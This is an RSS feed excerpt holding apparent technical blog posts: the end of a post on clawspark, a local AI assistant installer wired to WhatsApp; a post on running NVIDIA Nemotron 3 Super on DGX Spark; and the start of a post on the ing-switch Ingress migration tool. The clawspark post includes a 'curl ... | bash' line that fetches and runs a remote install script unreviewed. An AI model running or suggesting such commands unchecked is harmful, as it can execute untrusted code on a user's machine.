<td>Warm prompt evaluation</td>
<td>~265 tok/s</td>
</tr>
<tr>
<td>Warm text generation</td>
<td>~59 tok/s</td>
</tr>
<tr>
<td>End-to-end WhatsApp response</td>
<td>15-45 seconds</td>
</tr>
</tbody></table>
<p>The 59 tok/s generation speed is fast enough to feel responsive. You send a question on WhatsApp and the response arrives in 15-45 seconds depending on complexity. The cold load penalty only hits on the first query after a restart. After that, the model stays in memory.</p>
<p>To put this in perspective: 59 tok/s means the model generates roughly 45-50 words per second. A typical response of 200 words takes about 4 seconds of pure generation time. The rest of the 15-45 second latency comes from the WhatsApp message routing, tool calls (if the agent needs to search the web or read a file), and response formatting.</p>
<p>Is this as fast as GPT-4o or Claude via cloud API? No. Cloud inference on dedicated hardware with massive batching will always be faster for raw token throughput. But it is fast enough for practical use, and your data never leaves your desk. That is the tradeoff.</p>
<p>For the 122B-A10B MoE model (the highest-ranked by llmfit), expect roughly 45 tok/s. Slightly slower but you get access to the full 122B model's knowledge with only 10B active parameters. The DGX Spark's 128GB unified memory can comfortably hold this model (33GB) with plenty of room for the KV cache.</p>
<h2>Hardware-Aware Model Selection with llmfit</h2>
<p>One of the hardest problems with local AI is knowing which model to use. There are hundreds of models on Ollama, each with different sizes, quantizations, and performance characteristics. Picking the wrong one means either wasting memory (model too small for the hardware) or crashing on load (model too big).</p>
<p>I integrated <a href="https://github.com/AlexsJones/llmfit">llmfit</a> to solve this. llmfit is a Rust-based CLI tool that detects your hardware (GPU, VRAM, RAM, CPU), scores every model in its database for fit, speed, and quality, and tells you which ones will actually run well.</p>
<p>For DGX Spark, I ran llmfit on the real hardware and it correctly detected the NVIDIA GB10 with 119.7 GB unified memory and CUDA backend. I then cross-referenced its top recommendations against the Ollama library to verify each model is actually pullable. The result is the curated list of 5 models you see during installation.</p>
<p>For all other hardware, the installer runs llmfit live:</p>
<ol>
<li><p>Install llmfit (one curl command, Rust binary)</p>
</li>
<li><p>Run <code>llmfit recommend --json -n 20 --min-fit good</code></p>
</li>
<li><p>Map each HF-style model name to an Ollama model ID (40+ regex patterns)</p>
</li>
<li><p>Verify each candidate exists on Ollama's library (HTTP check against ollama.com)</p>
</li>
<li><p>Present the top 5 verified models with score, estimated tok/s, and fit level</p>
</li>
</ol>
<p>If llmfit is not available or fails, the installer falls back to curated lists per hardware tier. No hardcoded guessing. Your GPU, your recommendations.</p>
<h2>WhatsApp Integration: The Deep Cut</h2>
<p>Getting WhatsApp working reliably was the hardest part of this entire project. Here is why.</p>
<p>OpenClaw uses the Baileys library, which is an unofficial WhatsApp Web client. It works by emulating a linked device session, the same protocol that WhatsApp Web uses in your browser. The connection is end-to-end encrypted and goes through WhatsApp's servers. There is no official API involved.</p>
<p>This creates three categories of problems:</p>
<p><strong>Protocol issues.</strong> WhatsApp regularly changes its protocol, and Baileys has to keep up. The browser string rejection (bug #3) is an example. WhatsApp started rejecting non-standard browser identifiers at some point, and OpenClaw's default string got caught.</p>
<p><strong>Group message handling.</strong> WhatsApp groups use Signal's sender keys protocol. When you first link a device, it needs to receive sender keys from all group participants before it can decrypt group messages. Setting <code>syncFullHistory: false</code> (bug #6) prevents this initial key exchange, making groups completely silent.</p>
<p><strong>Mention routing.</strong> In WhatsApp groups, @mentions get resolved to JIDs (WhatsApp internal user IDs). The bot's JID might not match its linked phone number's JID in all cases. The early return in mention detection (bug #7) means the bot never sees @mentions in groups unless you patch the code.</p>
<p>clawspark applies all three patches automatically and re-applies them after updates (since <code>npm update</code> overwrites the dist files). Groups require @mention to activate, and the agent is restricted to Q&amp;A only in group context. Full tool access is reserved for direct messages with the owner.</p>
<p>Voice notes work through the local-whisper skill, which runs Whisper (OpenAI's open-source speech-to-text model) locally on the GPU. On DGX Spark, it uses the large-v3 model for maximum transcription accuracy. On Jetson, it drops to the small model. On RTX, it scales based on available VRAM. The audio never leaves your machine.</p>
<h2>Skills</h2>
<p>clawspark installs 10 skills by default, verified against the OpenClaw skill registry:</p>
<table>
<thead>
<tr>
<th>Category</th>
<th>Skills</th>
</tr>
</thead>
<tbody><tr>
<td>Core</td>
<td>local-whisper, self-improvement, memory-setup</td>
</tr>
<tr>
<td>Voice</td>
<td>whatsapp-voice-chat-integration-open-source</td>
</tr>
<tr>
<td>Productivity</td>
<td>deep-research-pro, agent-browser</td>
</tr>
<tr>
<td>Knowledge</td>
<td>second-brain, proactive-agent</td>
</tr>
<tr>
<td>Web Search</td>
<td>ddg-web-search, local-web-search-skill</td>
</tr>
</tbody></table>
<p>Web search works without any API keys. The agent uses DuckDuckGo Lite via web_fetch, fetches result URLs, and composes answers from the content. No Brave API key, no Google API key, no external dependencies.</p>
<p>You can add or remove skills with <code>clawspark skills add &lt;name&gt;</code> and <code>clawspark skills remove &lt;name&gt;</code>. The skills.yaml file in your config directory is the source of truth, and <code>clawspark skills sync</code> reads it and installs everything.</p>
<h2>Getting Started</h2>
<p><strong>Tested and verified on DGX Spark.</strong> Should also work on Mac (Apple Silicon M1/M2/M3/M4), RTX desktops, and Jetson. The installer has fallbacks for all platforms -- macOS uses Homebrew, Ollama runs natively on Apple Silicon, and llmfit handles model selection. These platforms have not been end-to-end tested yet. Community testing welcome -- open an issue if you try it on different hardware.</p>
<pre><code class="language-bash">curl -fsSL https://clawspark.dev/install.sh | bash
</code></pre>
<p>Or with specific options:</p>
<pre><code class="language-bash">bash install.sh --model=qwen3.5:122b-a10b --messaging=whatsapp
</code></pre>
<p>After installation:</p>
<pre><code class="language-bash">clawspark status      # Check all components
clawspark benchmark   # Run a performance benchmark
clawspark logs        # Tail the gateway logs
clawspark restart     # Restart all services
clawspark update      # Update OpenClaw and re-apply patches
clawspark airgap on   # Enable air-gap mode
</code></pre>
<p>The web UI is at <code>http://localhost:18789/__openclaw__/canvas/</code>. The metrics dashboard is at <code>http://localhost:8900</code>.</p>
<p>Source code and documentation: <a href="https://clawspark.dev">clawspark.dev</a></p>
<h2>What is Next</h2>
<p>A few things I am working on:</p>
<p><strong>Multi-model routing.</strong> Use the fast 35B model for simple queries and automatically route complex reasoning tasks to the 122B model. The hardware can handle both loaded simultaneously since 128GB is enough for both.</p>
<p><strong>Better metrics.</strong> ClawMetry currently shows basic gateway stats. I want per-query latency tracking, token usage by model, and cost-equivalent comparisons (how much this query would have cost on cloud APIs).</p>
<p><strong>More hardware testing.</strong> The Jetson and RTX paths in clawspark are written and should work (hardware detection, llmfit model selection, Ollama setup), but I have only done full end-to-end testing on DGX Spark. Jetson AGX Orin is next. For RTX desktops, open a terminal and run the install command directly -- no SSH needed. If you try it on your hardware, please open an issue with your results.</p>
<p><strong>Upstream patches.</strong> The three source patches I wrote are necessary because of bugs in OpenClaw's compiled code. Ideally these get fixed upstream so the patches become unnecessary. I plan to submit them.</p>
<h2>Closing Thoughts</h2>
<p>Two years ago, running a capable AI model locally meant a server rack, a cooling system, and deep knowledge of CUDA. Today it means a quiet box on your desk and a bash script.</p>
<p>The gap between local and cloud AI is closing fast. Not because local is getting as fast as cloud (dedicated data center hardware will always win on raw throughput), but because local is getting good enough. 59 tokens per second from a 35B-parameter MoE model on a desktop machine is good enough for a personal assistant. The tradeoff is straightforward: you get complete data privacy and zero ongoing cost in exchange for slightly higher latency.</p>
<p>clawspark is just the glue. It takes hardware that is already capable (DGX Spark), software that is already good (OpenClaw, Ollama), a model that is already smart (Qwen 3.5), and a tool selector that actually knows your hardware (llmfit), and removes the friction between them. The one-click part is not the innovation. The innovation is all the edge cases, patches, and defaults that make it actually work when you run it for the first time on real hardware.</p>
<p>If you have a DGX Spark, an RTX GPU, a Mac with Apple Silicon, or a Jetson, give it a try. One command, a few questions, and you have a private AI assistant that genuinely never phones home.</p>
<hr />
<p><em>GitHub:</em> <a href="https://github.com/saiyam1814/claw-spark"><em>github.com/saiyam1814/claw-spark</em></a> <em>Website:</em> <a href="https://clawspark.dev"><em>clawspark.dev</em></a></p>
]]></content:encoded></item><item><title><![CDATA[Here's What I Learned About Nemotron 3 Super -I Ran a 120B Parameter Model on Nvidia DGX Spark]]></title><description><![CDATA[There’s a moment when you’re watching a model load into memory. The progress bar is filling up to 87 gigabytes and it hits you. You’re about to talk to something that has 120 billion parameters. Not t]]></description><link>https://blog.kubesimplify.com/nemotron3-on-dgx-spark</link><guid isPermaLink="true">https://blog.kubesimplify.com/nemotron3-on-dgx-spark</guid><category><![CDATA[nemotron 3]]></category><category><![CDATA[nemotron]]></category><category><![CDATA[DGXSpark]]></category><category><![CDATA[NVIDIA]]></category><category><![CDATA[ai agents]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Sat, 14 Mar 2026 12:44:36 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/6f7096fe-54a1-4e2e-aacc-184cb109d071.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>There’s a moment when you’re watching a model load into memory. The progress bar is filling up to 87 gigabytes and it hits you. You’re about to talk to something that has 120 billion parameters. Not through an API. Not in the cloud. On a box the size of a sandwich sitting next to your keyboard.</p>
<p>That’s what running NVIDIA’s Nemotron 3 Super on the DGX Spark feels like. After spending time with it, I think this model needs more attention than it’s getting. Not because of one benchmark number, but because of the engineering choices behind it. These choices show you exactly where AI inference is going.</p>
<p>Let me walk you through what I found.</p>
<h3><strong>The Headline Numbers (And Why They’re Misleading)</strong></h3>
<p>When NVIDIA drops a model, they lead with the big stats: 120 billion parameters, 1 million token context, 5x throughput. These numbers are real, but they hide the real story.</p>
<p>The number that actually matters is <strong>12.7 billion</strong>. That’s how many parameters fire per token. Out of 120.6 billion total, only about a tenth light up for any given input. The rest sit there, waiting until the right token needs their skill.</p>
<p>This roughly 10:1 ratio is the whole story. It’s why the model runs on desktop hardware. It’s why it’s fast. It’s why NVIDIA built it this way. Everything else follows from this one design choice.</p>
<p>The second thing that matters is the layer mix. The model has 88 layers total. Most of them are Mamba-2 layers. This is a completely different architecture from transformers and it doesn’t need to store growing key-value caches. Only a small number are traditional transformer attention layers. NVIDIA interleaves them in a repeating pattern: groups of Mamba-2 blocks paired with Latent MoE layers, with attention layers placed at key depths. We’ll come back to why this split is so important.</p>
<h3><strong>Three Architectures in a Trenchcoat</strong></h3>
<p>Nemotron 3 Super isn’t one architecture. It’s three, stacked together so each one does what it’s best at. Once you get this stack, you get why the model works the way it does.</p>
<img src="https://pbs.twimg.com/media/HDSdda-bcAA0LrZ?format=jpg&amp;name=large" alt="" style="display:block;margin:0 auto" />

<h3><strong>Mamba-2: The Workhorse</strong></h3>
<p>The majority of the 88 layers are Mamba-2 blocks. Mamba is a state-space model. Think of it like a recurrent architecture that keeps a compact, fixed-size state and updates it as each new token comes in.</p>
<p>The key thing: Mamba runs in <strong>linear time</strong>. Double the sequence length, you roughly double the compute. Compare that with transformer attention, where doubling the sequence quadruples the compute.</p>
<p>This is why Nemotron 3 Super can actually deliver a 1-million-token context window in practice. With most layers being Mamba, the bulk of the model doesn’t care how long your prompt is. Compute grows linearly, and memory doesn’t grow at all. Mamba’s state stays the same size no matter the sequence length.</p>
<h3><strong>Transformer Attention: The Precision Tool</strong></h3>
<p>A small number of layers in the stack are traditional transformer attention layers, using Grouped Query Attention with 32 query heads, 2 KV heads, and a head dimension of 128. These are confirmed specs from the technical report.</p>
<p>Why keep any attention at all? Because Mamba has a known gap. It struggles with precise associative recall, like connecting a specific detail from position 1,000 with something at position 500,000. The fixed-size state means some info gets compressed away over very long sequences.</p>
<p>NVIDIA’s fix: place attention layers at carefully chosen depths through the 88-layer stack. They act like precision tools, handling the long-range connections that Mamba would miss, while Mamba does everything else fast.</p>
<p>The result: the vast majority of the model’s compute happens in linear time. Quadratic attention is used only where it’s needed.</p>
<h3><strong>The KV Cache Payoff</strong></h3>
<p>This design has a huge side effect that matters a lot for hardware like the DGX Spark.</p>
<p>In a transformer, the KV cache grows with sequence length. Every attention layer stores key and value tensors for every token it has seen. For a model like Qwen 3.5-122B with 12 full attention layers, head dimension 256, and 2 KV heads, that adds up to about 22.9 GiB at 1 million tokens in BF16. (The math: 12 layers x 2 KV heads x 256 dim x 2 bytes x 2 for K+V x 1M tokens.)</p>
<img src="https://substackcdn.com/image/fetch/$s_!w9U0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac671316-de89-4a33-b0e6-c80cc8fdfebf_2048x1365.jpeg" alt="Image" style="display:block;margin:0 auto" />

<p>Nemotron 3 Super has far fewer attention layers, each with head dimension 128 and 2 KV heads. Because Mamba layers use a fixed-size state (no KV cache growth), only the attention layers add to the KV cache. The bottom line: the KV cache is roughly <strong>3x smaller</strong> than Qwen’s at the same context length. On the DGX Spark’s 128 GB of unified memory, you load the 87 GB model, add a relatively small KV cache even at very long contexts, and you still have plenty of room to spare.</p>
<p>For practical purposes, the KV cache almost doesn’t matter with this model.</p>
<h2><strong>Latent MoE: Getting 4x More Experts for Free</strong></h2>
<p>The Mixture of Experts layer is where things get really clever.</p>
<img src="https://substackcdn.com/image/fetch/$s_!5Kdw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F89ffec61-5e59-42db-b9f3-d7943928265b_2048x1365.jpeg" alt="Image" style="display:block;margin:0 auto" />

<p>In a standard MoE, each token is routed to one or two “expert” sub-networks from a larger pool. The idea is simple: different experts specialize in different things, and the router learns which expert to call for each token.</p>
<p>The problem is cost. Routing happens at the model’s full hidden dimension, and each expert operates at that same dimension. If you want more experts (for better specialization), routing gets more expensive. If you want to activate more experts per token (for better accuracy), inference gets slower.</p>
<p>Latent MoE solves this with a compression trick. Before routing, token embeddings are projected from the full hidden dimension down to a smaller latent dimension. The router operates in this compressed space, which is much cheaper. Experts also operate on the compressed representations.</p>
<p>The compute you save on compression doesn’t disappear. It gets reinvested. NVIDIA uses it to increase both the total number of experts <strong>and</strong> the number of experts active per token by the same factor. The result: 4x more experts consulted per token, at approximately the same inference cost as a standard MoE with fewer experts.</p>
<p>Each token effectively gets a committee of 4 specialists deliberating instead of a single expert making a snap judgment. The accuracy improvement is significant, and you don’t pay for it in latency.</p>
<h2><strong>Multi-Token Prediction: Built-In Speculative Decoding</strong></h2>
<p>Standard language models predict one token at a time. Generate position N, feed it back in, generate position N+1, repeat. This sequential nature is the fundamental bottleneck in text generation speed.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/e115fb71-9ad5-4d6c-abbc-2a36fe6f6559.png" alt="" style="display:block;margin:0 auto" />

<p>Nemotron 3 Super predicts multiple future tokens from each position simultaneously. The model has shared-weight prediction heads that project from the same internal representation to predict not just the next token, but several tokens ahead.</p>
<p>This serves two purposes. During training, it forces the model to learn longer-range dependencies. You can’t predict three tokens ahead without understanding the broader context. This makes the model smarter.</p>
<p>During inference, it works like built-in speculative decoding. Instead of generating one token per forward pass, the model proposes multiple tokens, verifies them, and keeps the correct ones. For structured output like code and tool calls, where the next few tokens are often very predictable, NVIDIA reports up to 3x wall-clock speedup. General chat won’t see the full 3x, but code generation benefits a lot.</p>
<p>The nice thing: you don’t need a separate draft model. The speculation is built right into the model.</p>
<h2><strong>How It Was Trained: The Three-Phase Pipeline</strong></h2>
<p>This is where NVIDIA’s openness really shines. They didn’t just release weights. They published the complete methodology, and the numbers are big.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/8961cc5a-2e77-4316-a388-efb33cccadf9.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Phase 1: Pretraining.</strong> 25 trillion tokens total (10 trillion unique), plus 10 billion additional tokens focused specifically on reasoning, plus 15 million coding problems. The majority of compute ran in NVFP4, which is NVIDIA’s native 4-bit floating point format. This is unusual and important: most models train in higher precision and quantize down later, losing accuracy. Nemotron 3 Super was born in FP4.</p>
<p><strong>Phase 2: Supervised Fine-Tuning.</strong> 7 million carefully selected samples from a corpus of 40 million. Coverage spans reasoning, instruction following, coding, safety, and critically, multi-step agent task completion. This phase is where the model learns to be useful, not just knowledgeable.</p>
<p><strong>Phase 3: Reinforcement Learning.</strong> 1.2 million environment rollouts across 21 different configurations, using NeMo Gym and NeMo RL frameworks with 37 datasets. This is where the model learns to reason through complex, multi-step problems. This is the kind of thinking that makes it useful as an autonomous agent.</p>
<p>NVIDIA released around 10 of the pretraining datasets publicly, 15 RL training environments, and about 10 of the 37 RL datasets, along with complete training recipes. The Artificial Analysis Openness Index scored this release at 83 out of 100. Only two research labs (Ai2 and MBZUAI) score higher, and their models aren’t anywhere near this performance level.</p>
<p>This kind of transparency is new for a model this good. With enough compute, you could follow their recipe and reproduce the training run yourself.</p>
<h2><strong>Why NVIDIA Built This for Agents</strong></h2>
<p>The model wasn’t designed for chatbots. Every architectural decision points toward one use case: long-running autonomous agents. The 1M context, the sparse activation, the MoE efficiency. All of it.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/b0f51fa2-0d6e-4ec0-b839-ba0927fb91e7.png" alt="" style="display:block;margin:0 auto" />

<p>When you run a multi-agent system, token consumption explodes. Each agent interaction requires sending the full conversation history, tool outputs, intermediate reasoning steps, and results from other agents. NVIDIA’s numbers suggest multi-agent workflows generate up to 15x more tokens than standard chat.</p>
<p>This creates two problems that kill most models:</p>
<p><strong>Context overflow.</strong> At 128K tokens, even large models run out of context in extended agent sessions. The agent either loses early context (and the original goal with it), or you implement complex summarization/RAG schemes that lose fidelity. Nemotron 3 Super’s million-token window means the agent can hold the entire workflow state. Every tool call, every intermediate result, every reasoning step stays in memory without ever truncating.</p>
<p><strong>The cost of thinking.</strong> Agents need to reason at every step. If each reasoning call costs as much as a full 120B forward pass, running thousands of agent subtasks gets very expensive very fast. With only 12B active parameters, each call through Nemotron 3 Super costs a fraction of what a dense 120B model would. You get the intelligence of a large model with the economics of a small one.</p>
<p>The benchmarks back this up. On PinchBench, which tests models as actual coding agents (not just answering coding questions), it scores 85.6%. That’s the best open model out there. On DeepResearch Bench, which tests multi-step research over large document sets, NVIDIA’s AI-Q multi-agent system took the number one position. AI-Q is built on top of a fine-tuned Nemotron 3 Super. Worth noting: AI-Q is a full multi-agent system with orchestrator, planner, and researcher sub-agents. It’s not just the base model running solo. But Nemotron 3 Super is the reasoning engine at its core.</p>
<p>Why Sparse MoE is Perfect for the DGX Spark</p>
<p>Here’s something that sounds wrong: on the DGX Spark, a 120B MoE model runs way faster than a smaller 70B dense model. The bigger model is faster. How?</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/a316513a-2122-4da5-a635-cba89aa8e443.png" alt="" style="display:block;margin:0 auto" />

<h2><strong>Running It: Three Paths from Zero to Inference</strong></h2>
<p>I tested three ways to get Nemotron 3 Super running on the DGX Spark. Here they are, from simplest to most configurable.</p>
<p><strong>Path 1: Ollama (Two Commands)</strong></p>
<p>The fastest possible path. If Ollama is installed on your Spark (it comes pre-installed on DGX OS):</p>
<pre><code class="language-text">ollama pull nemotron-3-super

ollama run nemotron-3-super
</code></pre>
<pre><code class="language-text">saiyam@spark-5385:~$   ollama pull nemotron-3-super
pulling manifest 
pulling 0fc53cc990a2: 100% ▕███████████████████████████████████████████████████████████████████████████████████████▏  86 GB                         
pulling d02d998e5ae6: 100% ▕███████████████████████████████████████████████████████████████████████████████████████▏  23 KB                         
pulling 02897ca0d6a3: 100% ▕███████████████████████████████████████████████████████████████████████████████████████▏   31 B                         
pulling 9c35241878aa: 100% ▕███████████████████████████████████████████████████████████████████████████████████████▏  509 B                         
verifying sha256 digest 
writing manifest 
success 


saiyam@spark-5385:~$ ollama list

NAME                       ID              SIZE     MODIFIED               
nemotron-3-super:latest    95acc78b3ffd    86 GB    Less than a second ago    
qwen3.5:35b-a3b            3460ffeede54    23 GB    5 days ago                
saiyam@spark-5385:~$  ollama run nemotron-3-super --verbose "Explain the difference between Mamba and Transformer architectures like I'm a DevOps engineer who has never worked with ML."
</code></pre>
<pre><code class="language-text">ollama show nemotron-3-super 
  Model
    architecture        nemotron_h_moe    
    parameters          123.6B            
    context length      262144            
    embedding length    4096              
    quantization        Q4_K_M            
    requires            0.17.1            

  Capabilities
    completion    
    tools         
    thinking      

  Parameters
    temperature    1       
    top_p          0.95    

  License
    NVIDIA Software and Model Evaluation License                                            
    IMPORTANT NOTICE – PLEASE READ AND AGREE BEFORE USING THE NVIDIA LICENSED MATERIALS.    
    ...                                                                                     
</code></pre>
<p><strong>Real performance on DGX Spark:</strong></p>
<pre><code class="language-text">prompt eval rate:  3.51 tokens/s
eval rate: 19.50 tokens/s
eval count:  2504 tokens
total duration:  2m56s
</code></pre>
<p><strong>Path 2: llama.cpp from Source (Full Control)</strong></p>
<p>If you want more control over context sizes, quantization, and API serving, you can build llama.cpp from source and run the GGUF model directly. Unsloth has a detailed guide for this: <a href="https://docs.unsloth.ai/basics/nvidia-nemotron-3-super">Unsloth Nemotron 3 Super Guide</a></p>
<p>The key things to know for DGX Spark:</p>
<ul>
<li><p>When building llama.cpp, use -DCMAKE_CUDA_ARCHITECTURES=”121” for the GB10 chip. Without this you’ll fall back to CPU inference.</p>
</li>
<li><p>The GGUF files are at <a href="https://huggingface.co/unsloth/NVIDIA-Nemotron-3-Super-120B-A12B-GGUF">unsloth/NVIDIA-Nemotron-3-Super-120B-A12B-GGUF</a> on Hugging Face.</p>
</li>
<li><p>NVIDIA recommends temperature 1.0 for general chat, and 0.6 with top_p 0.95 for tool calling.</p>
</li>
<li><p>Set --ctx-size based on your available memory. On DGX Spark, 16384 to 262144 is practical. Setting it to 1M may trigger CUDA OOM.</p>
</li>
<li><p>llama-server gives you an OpenAI-compatible API, so VS Code Continue, LangChain, CrewAI, Open WebUI all just work.</p>
</li>
</ul>
<h2><strong>The DGX Spark: Quick Hardware Context</strong></h2>
<p>For readers unfamiliar with the hardware, the DGX Spark is NVIDIA’s desktop AI computer. The relevant specs:</p>
<ul>
<li><p><strong>Chip:</strong> GB10 Grace Blackwell Superchip</p>
</li>
<li><p><strong>Memory:</strong> 128 GB unified LPDDR5x (shared CPU/GPU, 273 GB/s)</p>
</li>
<li><p><strong>GPU:</strong> 6,144 CUDA cores, 5th-gen Tensor Cores, 1 PFLOP FP4 sparse</p>
</li>
<li><p><strong>CPU:</strong> 20-core ARM (10x Cortex-X925 + 10x Cortex-A725)</p>
</li>
<li><p><strong>Size:</strong> 150mm x 150mm x 50mm, 1.2 kg</p>
</li>
<li><p><strong>Power:</strong> 240W</p>
</li>
</ul>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/d8e3fd38-2ef8-488a-b7f4-676d1edd7880.png" alt="" style="display:block;margin:0 auto" />

<p>The unified memory is the key. Unlike a discrete GPU where you’re limited by VRAM (24 GB on an RTX 4090, 32 GB on an RTX 5090), the DGX Spark’s 128 GB is coherently shared between CPU and GPU with no PCIe bottleneck. The full 87 GB model lives in one address space.</p>
<p>NVIDIA rates it for models up to 200 billion parameters on a single unit, or 405 billion on two connected Sparks.</p>
<h2><strong>Putting It in Context: How Nemotron 3 Super Compares</strong></h2>
<p>Here’s the honest comparison against peers, based on published third-party benchmarks:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/354ed625-31cf-4636-950a-438ef99234d1.png" alt="" style="display:block;margin:0 auto" />

<h3><strong>What I’d Actually Use This For</strong></h3>
<p>After spending time with the model, here’s where I see genuine value in the Nemotron + DGX Spark combination:</p>
<p><strong>Openclaw</strong> - I am going to put this as the model for openclaw too which is already running on my machine.</p>
<p><strong>Private data analysis.</strong> If you work in healthcare, finance, legal, or defense, some data simply cannot leave your building. No cloud provider promise changes the rules. A local model that never touches a network is the only option for these workloads.</p>
<p><strong>Code review and analysis.</strong> 73.4% precision on Qodo’s code review benchmark means about three out of four issues it flags are real. That’s useful enough for a local code review helper, especially when you’re working on code you can’t send to an external API.</p>
<p><strong>Long-document reasoning.</strong> The million-token context with a tiny KV cache means you can load entire codebases, spec documents, or stacks of research papers and ask questions across everything. No chunking, no RAG pipeline needed. Just load it all and ask.</p>
<p>Where I wouldn’t use it: production serving at scale, real-time latency-critical applications, or model training. The DGX Spark is an inference machine, not a training rig.</p>
<h3><strong>The Bigger Picture</strong></h3>
<p>Nemotron 3 Super is interesting as a model, but it’s even more interesting as a strategy.</p>
<p>NVIDIA makes the chips (GB10, B200), the inference runtime (NIM, TensorRT-LLM), the training framework (NeMo), and now the models (Nemotron). They’ve released the model, the data, and the recipes. Everything except the hardware to train on.</p>
<p>That’s the play. The more developers build on Nemotron, the more they need NVIDIA hardware. The openness isn’t charity. It’s ecosystem building.</p>
<p>But for us as practitioners, the result is clearly good. We get a top-tier model with full training transparency, running on hardware we can put on a desk. The hybrid Mamba-Transformer architecture with Latent MoE and multi-token prediction isn’t just a research paper. It’s a practical solution for running large models on limited hardware.</p>
<p>NVIDIA has confirmed that Ultra, the bigger sibling at roughly 500 billion parameters, is coming. If Super at 120B is this capable, Ultra will be worth watching closely.</p>
<p>Sources:</p>
<ul>
<li><p><a href="https://research.nvidia.com/labs/nemotron/files/NVIDIA-Nemotron-3-Super-Technical-Report.pdf"><strong>NVIDIA Nemotron 3 Super Technical Report (PDF)</strong></a></p>
</li>
<li><p><a href="https://developer.nvidia.com/blog/introducing-nemotron-3-super-an-open-hybrid-mamba-transformer-moe-for-agentic-reasoning/"><strong>NVIDIA Technical Blog: Introducing Nemotron 3 Super</strong></a></p>
</li>
<li><p><a href="https://blogs.nvidia.com/blog/nemotron-3-super-agentic-ai/"><strong>NVIDIA Blog: 5x Higher Throughput for Agentic AI</strong></a></p>
</li>
<li><p><a href="https://artificialanalysis.ai/articles/nvidia-nemotron-3-super-the-new-leader-in-open-efficient-intelligence"><strong>Artificial Analysis: Nemotron 3 Super — The New Leader in Open Intelligence</strong></a></p>
</li>
<li><p><a href="https://www.qodo.ai/blog/nvidia-nemotron-3-super-is-closing-the-gap-for-open-source-models/"><strong>Qodo: Code Review Analysis</strong></a></p>
</li>
<li><p><a href="https://ollama.com/blog/dgx-spark"><strong>Ollama DGX Spark Benchmarks</strong></a></p>
</li>
<li><p><a href="https://lmsys.org/blog/2025-10-13-nvidia-dgx-spark/"><strong>DGX Spark Performance (LMSYS)</strong></a></p>
</li>
<li><p><a href="https://www.pinchbench.com/"><strong>PinchBench</strong></a></p>
</li>
<li><p>My own testing on DGX Spark — 19.5 tok/s (Q4_K_M, Ollama), prompt eval 3.51 tok/s</p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[ing-switch: Migrate from Ingress NGINX to Traefik or Gateway API in Minutes, Not Days]]></title><description><![CDATA[If you run Kubernetes, there's a deadline you can't ignore: Ingress NGINX is being deprecated in March 2026. Roughly half of all Kubernetes clusters depend on it. That's a lot of teams who need a migr]]></description><link>https://blog.kubesimplify.com/ing-switch-migrate-from-ingress-nginx-to-traefik-or-gateway-api-in-minutes-not-days</link><guid isPermaLink="true">https://blog.kubesimplify.com/ing-switch-migrate-from-ingress-nginx-to-traefik-or-gateway-api-in-minutes-not-days</guid><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Wed, 25 Feb 2026 17:24:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/5df7c855-f9ff-4859-9415-e2899869e70b.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>If you run Kubernetes, there's a deadline you can't ignore: <strong>Ingress NGINX is being deprecated in March 2026</strong>. Roughly half of all Kubernetes clusters depend on it. That's a lot of teams who need a migration plan — and most of them are going to discover that it's harder than it looks.</p>
<p>The core problem isn't moving from one controller to another. It's that Ingress NGINX is held together by annotations. Hundreds of <code>nginx.ingress.kubernetes.io/*</code> annotations that control everything from TLS redirects to rate limiting to sticky sessions to canary deployments. These annotations have no direct equivalent in a new controller. Some map cleanly. Some map partially, with caveats. Some have no equivalent at all. And the existing tooling (<code>ingress2gateway</code>) only handles basic routing — it doesn't tell you what you're losing or how to compensate.</p>
<p>That's why I built <a href="https://github.com/saiyam1814/ing-switch"><strong>ing-switch</strong></a> — an open-source CLI + visual UI that takes you through the full migration lifecycle: scan → analyze → generate → verify → cutover → cleanup.</p>
<hr />
<h2>What ing-switch does</h2>
<p>The tool has four commands that map to four stages of migration:</p>
<pre><code class="language-bash">ing-switch scan      # detect your controller + list all ingresses
ing-switch analyze   # map every annotation to the target controller
ing-switch migrate   # generate ready-to-apply manifests
ing-switch ui        # open the visual 4-page migration dashboard at :8080
</code></pre>
<p>And it supports two migration targets:</p>
<table style="min-width:50px"><colgroup><col style="min-width:25px"></col><col style="min-width:25px"></col></colgroup><tbody><tr><th><p>Target</p></th><th><p>What's generated</p></th></tr><tr><td><p><strong>Traefik v3</strong></p></td><td><p>Traefik Middleware CRDs + updated Ingress resources (stays on <code>kind: Ingress</code>, no new CRDs to learn)</p></td></tr><tr><td><p><strong>Gateway API (Envoy Gateway)</strong></p></td><td><p>GatewayClass + Gateway + HTTPRoutes + BackendTrafficPolicy + SecurityPolicy</p></td></tr></tbody></table>

<p><strong>Traefik</strong> is the lowest-friction path: you keep <code>kind: Ingress</code>, your team learns almost nothing new, and almost all annotations have a Traefik equivalent. <strong>Gateway API</strong> is the future-proof path: standardized, implementation-agnostic, and where the ecosystem is heading — but it requires more preparation for partial-support annotations.</p>
<hr />
<h2>Annotation coverage: the hard part</h2>
<p>This is the part most migration tools skip. <code>ing-switch</code> maps over 50 <code>nginx.ingress.kubernetes.io/*</code> annotations for both targets. Here's a sample:</p>
